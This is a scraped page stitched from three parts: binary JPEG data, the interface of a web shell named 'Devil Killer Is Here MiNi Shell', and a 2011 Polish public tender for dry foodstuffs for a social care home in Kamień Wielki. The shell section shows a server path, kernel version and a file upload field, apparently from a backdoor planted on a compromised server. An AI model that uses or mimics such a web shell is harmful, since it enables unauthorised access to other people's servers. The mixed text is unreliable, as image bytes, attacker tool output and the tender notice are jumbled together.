JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110204/42187-N-2011.html

<p class="kh_header"><b>Kamień Wielki: DOSTAWA PRODUKTÓW SUCHYCH dla Domu Pomocy Społecznej w Kamieniu Wielkim</b><br>
<b>Numer ogłoszenia: 42187 - 2011; data zamieszczenia: 04.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Stawna 40, 66-460 Kamień Wielki, woj. lubuskie, tel. 095 7515828, faks 095 7515828.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpskamien.powiatgorzowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA PRODUKTÓW SUCHYCH dla Domu Pomocy Społecznej w Kamieniu Wielkim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych dla DPS Kamień Wielki, transportem i na koszt Wykonawcy, w okresie od 01.03.2011 do 31.12.2011 - dostawy periodyczne, raz w tygodniu po wcześniejszym uzgodnieniu stron.
Zamówienie obejmuje łącznie asortyment:
1. Mąka tortowa - 800 kg	
OKREŚLENIE PRODUKTU
Produkt spożywczy otrzymany przez rozdrobnienie oczyszczonych ziaren pszenicy,
struktura i konsystencja - sypka, drobnoziarnista bez grudek,
barwa - biała z odcieniem żółtym, 
smak i zapach - charakterystyczny dla mąki pszennej,
Op. jednostkowe:    torba papierowa 1kg,

2. Mąka ziemniaczana - 20 kg
OKREŚLENIE PRODUKTU
Produkt spożywczy otrzymany ze skrobi ziemniaczanej,
struktura i konsystencja - sypka, drobnoziarnista bez grudek,
barwa - biała 
Op. jednostkowe:    torba papierowa 1kg,

3. Kasza manna  - 200 kg                   
OKREŚLENIE PRODUKTU
produkt spożywczy otrzymany przez rozdrobnienie ziaren pszenicy,
struktura i konsystencja - sypka, drobnoziarnista bez grudek,
barwa - biała z odcieniem żółtawym, 
wilgotność nie większa niż 15,3 %,
Op. jednostkowe:  torba polietylenowa spawana 1 kg,

4. Kasza jęczmienna średnia - 260 kg
OKREŚLENIE PRODUKTU
Produkt spożywczy otrzymany  z nasion jęczmienia
struktura i konsystencja - sypka, 
barwa - biała,
Op. jednostkowe:    torba foliowa  1kg,

5. Kasza gryczana prażona - 80 kg
OKREŚLENIE PRODUKTU
Produkt spożywczy otrzymany  z prażonych nasion gryki, 
struktura i konsystencja - sypka, 
barwa - brązowa,
Op. jednostkowe:    torba foliowa  1kg,

6. Ryż biały - 620 kg
OKREŚLENIE PRODUKTU
barwa - biała
Op. jednostkowe:    torba papierowa 1 kg,

7. Płatki kukurydziane - 150 kg
OKREŚLENIE PRODUKTU
produkt spożywczy otrzymany przez przetworzenie ziaren kukurydzy - zmielenie całego obłuszczonego ziarna kukurydzy i poddanie obróbce zgodnie z recepturą zakładową,
struktura i konsystencja - sypka, w postaci drobnych różnokształtnych płatków bez grudek, płatki nie pokruszone,
barwa - złotożółta z różnymi odcieniami, 
wilgotność nie większa niż 12%,
Op. jednostkowe:  torba polietylenowa spawana 1 kg , 

8. Płatki owsiane zwykłe - 150 kg       
OKREŚLENIE PRODUKTU
produkt spożywczy otrzymany przez przetworzenie ziaren owsa - zgniecenie na walcach całego obłuszczonego ziarna owsa i poddanie obróbce hydrotermicznej,
struktura i konsystencja - sypka, w postaci drobnych płatków bez grudek,
barwa - szarobiała z różnymi odcieniami, 
wilgotność nie większa niż 12 %,
smak i zapach - charakterystyczny dla płatków owsianych lekko orzeszkowy, 
Op. jednostkowe:  torba polietylenowa spawana 0,5 kg , torba papierowa 0,5 kg,

9. Cukier biały kryształ - 2600 kg
OKREŚLENIE PRODUKTU
Produkt spożywczy otrzymany z buraków cukrowych,
struktura i konsystencja - sypka, drobnoziarnista bez grudek,
barwa - biała,
Op. jednostkowe:    torba papierowa 1kg,

10. Cukier puder - 18 kg
OKREŚLENIE PRODUKTU
Produkt spożywczy otrzymany ze zmielenia cukru, 
struktura i konsystencja - sypka, miałka bez grudek,
barwa - biała, 
Op. jednostkowe:    torba foliowa, papierowa  0,5 kg,

11. Makaron popularny - 2150 szt.
OKREŚLENIE PRODUKTU
Produkt spożywczy otrzymany  z  mąki pszennej, jaj, 
struktura i konsystencja - różne kształty (kolanka, świderki, nitki cięte, nitki długie, wstążka długa ,muszelki, gwiazdki, łazanki, zacierka),
barwa - żółta,
Op. jednostkowe:   torba foliowa  0,5kg,

12. Płatki ryżowe błyskawiczne - 430 szt.
OKREŚLENIE PRODUKTU
produkt spożywczy otrzymany przez przetworzenie ziaren ryżu - zgniecenie na walcach całego obłuszczonego ziarna ryżu i poddanie obróbce hydrotermicznej,
struktura i konsystencja - sypka, w postaci drobnych płatków bez grudek
barwa - biała z różnymi odcieniami, 
wilgotność nie większa niż 12 %
smak i zapach - charakterystyczny dla płatków ryżowych, 
Op. jednostkowe:  torba polietylenowa spawana, torba papierowa 0,3 kg

13. Olej jadalny  - 310 l.
OKREŚLENIE PRODUKTU
wymagania klasyfikacyjne:
produkt spożywczy otrzymany z rzepaku lub słonecznika, który został poddany następującym procesom rafinacyjnym: 
odśluzowaniu (odszlamowaniu), odkwaszaniu (neutralizacji i, lub destylacji), odbarwieniu (bieleniu) oraz odwadnianiu (dezodoryzacji),
struktura i konsystencja  w temperaturze 20 C 
- płynna, przejrzysta, klarowna bez osadu,
Op. jednostkowe:    butelka plastikowa (materiał opakowaniowy dopuszczony do kontaktu z żywnością) od 1 do 3 l,

14. Pasztet drobiowiy - 410 szt.
Konserwa wyprodukowana z mięsa drobiowego  z dodatkiem substancji dodatkowych dozwolonych. Konserwy powinny być szczelne i nie wykazywać wad zamknięcia,
Op. jednostkowe : puszki o pojemności 500g, 

15. Konserwa turystyczna - 450 szt.
OKREŚLENIE PRODUKTU  
Konserwa wyprodukowana z mięsa  wieprzowego z dodatkiem substancji dodatkowych dozwolonych. Konserwy powinny być szczelne i nie wykazywać wad zamknięcia,
Zawartość tłuszczu nie więcej niż 5,0% 
Zawartość soli nie więcej niż 3% 
Op. jednostkowe : puszki o pojemności 300g, 

16. Chrzan tarty  - 200 szt.                   
OKREŚLENIE PRODUKTU
produkt spożywczy otrzymany ze świeżych, pozbawionych skórki tartych korzeni chrzanu, kwasku cytrynowego z 
dodatkiem soli i cukru,
struktura - przetarta masa z zawartością drobnych fragmentów korzeni chrzanu,
smak i zapach - charakterystyczny dla chrzanu, lekko piekący, kwaśnosłodki, barwa biała lub biało kremowa
Op. jednostkowe:    słoiki szklane o poj.  300 g, 

17. Kapusta konserwowa czerwona - 250 szt.
OKREŚLENIE PRODUKTU
produkt spożywczy otrzymany z kapusty czerwonej, pozbawionej części niejadalnych w zalewie octowej z dodatkiem soli, cukru, olejów jadalnych oraz roślinnych przypraw aromatyczno - smakowych i poddany procesowi pasteryzacji.
wygląd - rozdrobniona o barwie filoetowo-bordowej,
konsystencja - lekko miękka, nierozpadająca się,
smak i zapach - charakterystyczny dla kapusty, kwaśnosłodki, złagodzony dodatkiem oleju,
Op. jednostkowe:    słoiki szklane o poj. 0,9 l 

18. Fasola sucha JAŚ - 110 szt
OKREŚLENIE PRODUKTU
Produkt spożywczy otrzymany  z  wysuszonych nasion fasoli,
struktura i konsystencja - sypka,
barwa - biała,
Op. jednostkowe:    torba foliowa 0,5 kg,

19. Groch łuskany połówki - 110 szt
OKREŚLENIE PRODUKTU
Produkt spożywczy otrzymany  z  wysuszonych nasion grochu,
struktura i konsystencja - sypka, 
barwa - żółta
Op. jednostkowe:    torba foliowa 0,4 kg,

20. Ogórki konserwowe całe     - 950 szt.          
OKREŚLENIE PRODUKTU
produkt spożywczy otrzymany ze świeżych ogórków, przypraw aromatyczno - smakowych, zalanych zalewą octową z dodatkiem soli i cukru, utrwalony przez pasteryzację w opakowaniu hermetycznie zamkniętym
struktura - dość luźno ułożone całe ogórki, jędrne, chrupkie, powierzchnia ogórków wolna od uszkodzeń mechanicznych i plam chorobowych, na przekroju poprzecznym widoczne słabo wykształcone nasiona,
smak i zapach - charakterystyczny dla ogórków konserwowych słodko - kwaśny z wyczuwalnym smakiem i aromatem przypraw,
wygląd zalewy - jasnożółta, klarowna z lekką opalizacją, dopuszcza się osad pochodzący z przypraw (kopru, chrzanu, gorczycy, itp.),
Op. jednostkowe:    słoiki szklane o poj. 0,9 l,

21. Groszek konserwowy    - 530 szt.
OKREŚLENIE PRODUKTU
produkt spożywczy otrzymany z konserwowanych ziaren groszku zielonego w zalewie konserwującej; ziarna całe, nieuszkodzone, zalewa barwy zielonkawa, z osadem tkanki roślinnej na dnie opakowania,
Konsystencja - miękka,  wyrównana,
Smak i zapach - charakterystyczny dla groszku zielonego bez obcych smaków i zapachów
Op. jednostkowe:    puszki o poj. 0,4 kg,
Puszki powinny być szczelne i nie wykazywać wad zamknięcia.

22. Koncentrat pomidorowy - 660 szt.
OKREŚLENIE PRODUKTU
produkt spożywczy otrzymany z  pomidorów 30 %,
Smak i zapach - charakterystyczny dla pomidorów bez obcych smaków i zapachów,
Op. jednostkowe:   słoiki szklane o poj. 200 g.

23. Sok pomidorowy - 790 szt.
OKREŚLENIE PRODUKTU
produkt spożywczy otrzymany z  pomidorów,
Smak i zapach - charakterystyczny dla pomidorów bez obcych smaków i zapachów,
Op. jednostkowe:   butelki szklane o poj.  0,33 l,

24. Sałatka warzywna konserwowa - 630 szt.
OKREŚLENIE PRODUKTU
produkt spożywczy otrzymany z warzyw różnego gatunku, pozbawionej części niejadalnych w zalewie octowej z dodatkiem soli, cukru, olejów jadalnych oraz roślinnych przypraw aromatyczno - smakowych i poddany procesowi pasteryzacji.
wygląd - rozdrobniona o barwie intensywnej,
konsystencja - lekko miękka, nierozpadająca się,
smak i zapach - charakterystyczny dla warzyw konserwowych, kwaśnosłodki, złagodzony dodatkiem oleju,
Op. jednostkowe:    słoiki szklane o poj. 0,9 l 

25. Fasolka szparagowa zielona konserwowa  - 990 szt.
OKREŚLENIE PRODUKTU
produkt spożywczy otrzymany z fasolki szparagowej zielonej  w zalewie konserwującej, strąki fasoli cięte, 
Konsystencja - miękka - wyrównana,
Smak i zapach - charakterystyczny dla fasoli bez obcych smaków i zapachów,
Op. jednostkowe:   słoiki szklane o poj. 470 g

26. Kompot             - 2600 szt.
OKREŚLENIE PRODUKTU
produkt spożywczy otrzymany z owoców poddany procesowi pasteryzacji, 
wygląd -  zalewa klarowna, konsystencja owoców miękka, ekstrakt ogólny nie mniej niż 20 %,
smak i zapach - smak słodki, charakterystyczny dla kompotu, masa owoców odciekniętych z zalewy min. 45 %, 
różne smaki,
Op. jednostkowe:    słoiki szklane o poj. 0,9 l

27. Dżem - różne smaki        - 1100 szt.
OKREŚLENIE PRODUKTU
wymagania klasyfikacyjne: dżem otrzymany z owoców, wiśni bez pestek , truskawek odszypułkowanych, czarnej porzeczki , moreli, brzoskwini,   produkt o odpowiedniej z żelowanej konsystencji, wynik gotowania owoców świeżych, mrożonych pasteryzowanych lub pulpy) z dodatkiem cukru, kwasów spożywczych, syropu skrobiowego, pektyny, kwasu L-askorbinowego i innych substancji dopuszczonych przez ustawodawstwo krajowe.
konsystencja - z żelowana, smarowna masa, 
wygląd - całe owoce lub ich fragmenty w z żelowanej, szklistej masie,
barwa - charakterystyczna dla użytych składników, możliwie wyrównana dla owoców i galaretki,
smak i zapach - charakterystyczny dla użytych owoców, 
zawartość ekstraktu ogólnego oznaczonego refraktometrycznie - nie mniej niż 63 %,
opakowanie jednostkowe: słoiki szklane 280 g

28. Sok owocowy - 70 szt.
OKREŚLENIE PRODUKTU
produkt - sok produkowany z soku owoców - jabłek, pomarańczy, wiśni, czarnej porzeczki, moreli, czereśni,  zawierający naturalne składniki smakowo - aromatyczne, nie gazowany, zdolny do fermentacji lecz nie sfermentowany otrzymany przez dodanie wody oraz cukrów lub miodu.
konsystencja - płynna, 
barwa - charakterystyczna dla użytych składników, klarowna, bez osadów i innych zanieczyszczeń, 
smak i zapach - charakterystyczny dla użytych owoców, smak świeży, orzeźwiający,
opakowania jednostkowe - słoiki szklane 1 l

29. Sok owocowy w kartonikach	- 500 szt.	
OKREŚLENIE PRODUKTU
produkt - napój produkowany z soku owoców  - jabłek, pomarańczy, wiśni, czarnej porzeczki, moreli, czereśni, zawierający naturalne składniki smakowo - aromatyczne, nie gazowany, zdolny do fermentacji lecz nie sfermentowany otrzymany przez dodanie wody oraz cukrów lub miodu.
konsystencja - płynna, 
barwa - charakterystyczna dla użytych składników, klarowna, bez osadów i innych zanieczyszczeń, 
smak i zapach - charakterystyczny dla użytych owoców, smak świeży, orzeźwiający,
opakowania jednostkowe - kartoniki wielowarstwowe powlekane, termozgrzewalne typu TETRA PAK posiadające atest instytucji akredytowanej o dopuszczeniu do kontaktu z żywnością o pojemności 0,2l z przyklejoną  słomką,

30. Syrop owocowy - 760 szt.
OKREŚLENIE PRODUKTU
produkt: Syrop owocowy do napojów. Rozcieńczalność minimum 1:10
asortyment : różne smaki ( wiśniowy , malinowy, truskawkowy, pomarańczowy, cytrynowy, miętowy, wieloowocowy, brzoskwiniowy, kiwi, jabłkowy),
zapach i smak - charakterystyczny dla danego gatunku,
Op. jednostkowe:    butelka plastikowa  ( dopuszczona do kontaktu z żywnością ) - 0,7 l,

31. Sól kuchenna - 450 kg
OKREŚLENIE PRODUKTU
struktura i konsystencja - sypka, drobnoziarnista bez grudek,
barwa - biała 
Op. jednostkowe:    torba foliowa 1kg,

32. Pieprz naturalny - 70 szt.
OKREŚLENIE PRODUKTU
zawartość pieprzu nie mniejsza niż 99,5 %,
struktura i konsystencja - sypka, bez grudek i zlepów,
barwa - szara,
smak i zapach - charakterystyczny dla pieprzu,
Op. jednostkowe:    torebka hermetycznie zamknięta 100 g,
 
33. Ziele angielskie - 45 szt.
OKREŚLENIE PRODUKTU
Produkt spożywczy otrzymany  z  wysuszonych ziaren ziela angielskiego,
struktura i konsystencja - sypka,
barwa, smak i zapach - charakterystyczny dla ziela angielskiego,
Op. jednostkowe:    torebka hermetycznie zamknięta 15 g,

34. Kwasek cytrynowy spożywczy           - 100 szt.
OKREŚLENIE PRODUKTU
zawartość kwasu cytrynowego nie mniej niż 99,5%,
struktura i konsystencja - sypka, drobne kryształki bez grudek i zlepów lub proszek,
barwa - bezbarwne kryształki lub biały proszek, 
smak - silnie kwaśny,
zapach - bezwonny,
Op. jednostkowe:    torebka hermetycznie zamknięta 20 g,

35. Majranek - 130 szt.
OKREŚLENIE PRODUKTU
zawartość majranku nie mniejsza niż 99,5 %,
struktura i konsystencja - sypka, bez grudek i zlepów, otrzymana z wysuszonych liści majranku,
barwa - szaro-zielona,
smak i zapach - charakterystyczny dla suszonego majranku,
Op. jednostkowe:    torebka hermetycznie zamknięta 14 g,

36. Liść laurowy - 45 szt.
OKREŚLENIE PRODUKTU
produkt otrzymywany z szuszonych liści lauru,
struktura i konsystencja - sypka, nie pokruszone liście,
barwa - szaro-zielona,
smak i zapach - charakterystyczny dla przyprawy,
Op. jednostkowe:    torebka hermetycznie zamknięta 6 g,

37. Musztarda stołowa    - 270 szt.                   
OKREŚLENIE PRODUKTU
musztarda pakowana w pojemniki z tworzyw sztucznych (materiał opakowaniowy dopuszczony do kontaktu z żywnością) (PN - 90/A - 75032)
struktura i konsystencja - jednolita,  gęsta,
barwa - właściwa dla zastosowanych surowców i dodanych składników zapachowo smakowych, dopuszcza się 
występowanie czarnych punkcików w przypadku stosowania gorczycy czarnej, jednolita w całej masie,
smak i zapach - piekący, słonawy, właściwy dla musztardy z wyczuwalnym zapachem przypraw, gorczycy,  
zawartość substancji suchej nie mniej niż 20 %,
Op. jednostkowe:   pojemniki plastikowe 180 g,
     
38. Przyprawa w płynie  typu MAGGI  lub równoważna             - 70 szt.
OKREŚLENIE PRODUKTU
produkt otrzymany przez wymieszanie wysuszonych rozdrobnionych surowców takich jak: kora, korzenie kłącza, ziela, liście, kwiaty, pąki, owoce, nasiona, przeznaczony do poprawienia smaku, zapachu i wyglądu potraw, 
struktura i konsystencja - płynna,
barwa - naturalna, niejednolita, właściwa użytym składnikom,
smak i zapach - aromatyczny, charakterystyczny dla składników,
Op. Jednostkowe:  butelka szklana 960 g,

39. Majonez            - 300 szt.
OKREŚLENIE PRODUKTU
majonez pakowany w słoiki szklane, szczelnie zamknięte i zabezpieczające produkt,
struktura i konsystencja - jednolita, kremowa, gładka,
barwa - jasnokremowa do żółtej, jednolita w całej masie,
smak i zapach - czysty, łagodny, charakterystyczny dla majonezu,
zawartość tłuszczu nie mniej niż 50,5 %, 
zawartość wody i substancji lotnych nie więcej niż 50 %,
zawartość żółtka jaj kurzego nie mniej niż 6,0 %,
Op. jednostkowe:    słoik szklany 470 g

40. Ocet spirytusowy 10 %               - 55 szt.
OKREŚLENIE PRODUKTU
ocet wyprodukowany z przedestylowanego alkoholu pochodzenia rolniczego,
struktura i konsystencja - jednolita, klarowna, płynna,
barwa - naturalna, przeźroczysta,
smak i zapach - czysty, mocno kwaśny,
zawartość kwasów ogółem w occie, wyrażona jako bezwodny kwas octowy powinna wynosić 100g na 
1000ml-10 %. Ocet pakowany w butelki szklane z nakrętką lub w butelki z  tworzywa sztucznego (materiał opakowaniowy dopuszczony do kontaktu z żywnością) o pojemności 0,5 l,

41. Proszek do pieczenia  - 20 szt.
OKREŚLENIE PRODUKTU
substancja spulchniająca z dodatkiem mąki pszennej, supka,
Op. jednostkowe:    torebka termozgrzewalna 30 g,

42. Cukier waniliowy - 680 szt.
OKREŚLENIE PRODUKTU
cukier aromatyzowany z zawartością błonnika roślinnego, sypki,
Op. jednostkowe:    torebka termozgrzewalna 16 g,

43. Żelatyna spożywcza - 140 szt.
OKREŚLENIE PRODUKTU
Żelatyna spożywcza wieprzowa
Op. jednostkowe:    torebka termozgrzewalna 15 g

44. Przyprawa uniwersalna  typu VEGETA  lub równoważna     - 180 szt.
OKREŚLENIE PRODUKTU
produkt otrzymany przez wymieszanie wysuszonych rozdrobnionych surowców takich jak: kora, korzenie kłącza, ziela, liście, kwiaty, pąki, owoce, nasiona, przeznaczony do poprawienia smaku, zapachu i wyglądu potraw 
struktura i konsystencja - sypka,
barwa - naturalna, niejednolita, właściwa użytym składnikom,
smak i zapach - aromatyczny, charakterystyczny dla składników,
zawartość wody nie więcej niż 12 %,
Op. Jednostkowe:  torba polietylenowa spawana (materiał opakowaniowy dopuszczony do kontaktu z żywnością) 200 g 

45. Cynamon mielony     - 20 szt.
OKREŚLENIE PRODUKTU
produkt spożywczy otrzymany z wysuszonych i zmielonych kawałków kory drzewa rodzaju Cinnammonum,
struktura i konsystencja - sypka, jednolity proszek,
barwa, smak i zapach - jasnobrązowa do brunatnej, jednolita.
Op. jednostkowe:    torebka hermetycznie zamknięta 15 g,

46. Herbata granulowana     - 1100 szt.
OKREŚLENIE PRODUKTU
produkt otrzymany przez wysuszenie liści jednogatunkowej herbaty,
struktura i konsystencja - sypka, granulowana,
barwa  charakterystyczna - czarna,
smak i zapach - charakterystyczny dla smaku herbaty naturalnej,
wyciąg wodny - minimum 32 % wyciągu wodnego w przeliczeniu na suchą masę,
zawartość garbników nie większa niż 7 %,
Op. jednostkowe:    torebka hermetycznie zamknięta 100 g,

47. Kawa zbożowa rozpuszczalna typu INKA lub równoważna   - 110 szt.
OKREŚLENIE PRODUKTU
produkt otrzymywany z prażonego: jęczmienia, żyta, buraków cukrowych, nie mniej niż 72%,
struktura i konsystencja - rozpuszczalna kawa zbożowa, sypka
barwa  charakterystyczna - czarna,
smak i zapach - charakterystyczny dla kawy zbożowej,
Op. jednostkowe:    torebka hermetycznie zamknięta 150 g,

48. Kakao naturalne   - 110 szt.
OKREŚLENIE PRODUKTU
produkt niskotłuszczowy, 10-12%
struktura i konsystencja - rozpuszczalna, sypka, 
barwa  charakterystyczna - ciemna
smak i zapach - charakterystyczny dla kakao, aromatyczne, wydajne,
Op. jednostkowe:    torebka hermetycznie zamknięta 80 g,

49. Herbata ekspresowa typu LIPTON lub równoważna        - 5 szt.
OKREŚLENIE PRODUKTU
produkt otrzymany przez wysuszenie liści jednogatunkowej herbaty,
struktura i konsystencja - sypka, granulat bez grudek,
barwa  charakterystyczna - czarna,
smak i zapach - charakterystyczny dla smaku herbaty naturalnej,
wyciąg wodny - minimum 32 % wyciągu wodnego w przeliczeniu na suchą masę,
zawartość garbników nie większa niż 7 %,
Op. jednostkowe:    pakowana w pojedyncze 2 gramowe torebki ze sznurkiem po 100 szt, w pudełku lub torebce foliowej,

50. Kawa naturalna palona mielona typu PREMIUM lub równoważna   - 15 szt.    
OKREŚLENIE PRODUKTU
Kawa naturalna palona drobno mielona 
produkt otrzymany przez upalenie ziarna kawy surowej, i następnie zmielenia jej, bez użycia żadnych dodatkowych zabiegów i środków zmieniających jej naturalny charakter,
struktura i konsystencja - sypka, proszek drobnoziarnisty o wyrównanym stopniu granulacji bez grudek,
barwa - naturalna dla kawy, brązowa, 
smak i zapach - charakterystyczny dla kawy naturalnej,
zawartość wody nie więcej niż 3,0%,
Op. jednostkowe:    kawa pakowana próżniowo 80 g

51. Miód naturalny (nektarowy) - 30 szt.
OKREŚLENIE PRODUKTU
Miód naturalny odmian: akacjowy, lipowy, wielokwiatowy.
opakowania jednostkowe - w  słoikach szklanych 380 g,

52. Kisiel - 230 szt
OKREŚLENIE PRODUKTU
struktura i konsystencja - sypka, drobnoziarnista bez grudek,
smak i zapach - różne smaki, zapach charakterystyczny dla danego smaku,
Op. jednostkowe:    torba foliowa termozgrzewalna 38 g,

53. Budyń  - 580 szt.
OKREŚLENIE PRODUKTU
struktura i konsystencja - sypka, drobnoziarnista bez grudek,
smak i zapach - różne smaki, zapach charakterystyczny dla danego smaku,
Op. jednostkowe:    torba foliowa termozgrzewalna 40 g,

54. Krakersy - 310 szt.
OKREŚLENIE PRODUKTU
produkt otrzymany z mąki pszennej, tłuszczu roślinnego, soli, ekstraktu słodowego, regulator kwasowości,
barwa - jasnobrązowa, ciemnożółta,
smak i zapach - charakterystyczny dla krakersów,
Op. jednostkowe:    torba foliowa termozgrzewalna 180g,

55. Drożdże - 115 szt.
OKREŚLENIE PRODUKTU
produkt świerzy
barwa - charakterystyczna dla drożdży, bez nalotów i pleśni,
smak i zapach - charakterystyczny dla drożdży,
Op. jednostkowe:    100g

56. Kukurydza konserwowa  - 90 szt.
OKREŚLENIE PRODUKTU
produkt spożywczy otrzymany z konserwowanych ziaren młodej kukurydzy luzem w zalewie konserwującej,
ziarna całe nieuszkodzone, zalewa barwy żółtawej i żółta, opalizująca lub mętna z osadem tkanki roślinnej na dnie opakowania,
Konsystencja miękka - wyrównana,
Smak i zapach - charakterystyczny dla kukurydzy bez obcych smaków i zapachów,
Op. jednostkowe:    puszki o poj. 425 g,
Puszki powinny być szczelne i nie wykazywać wad zamknięcia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.60.00.00-4, 15.30.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

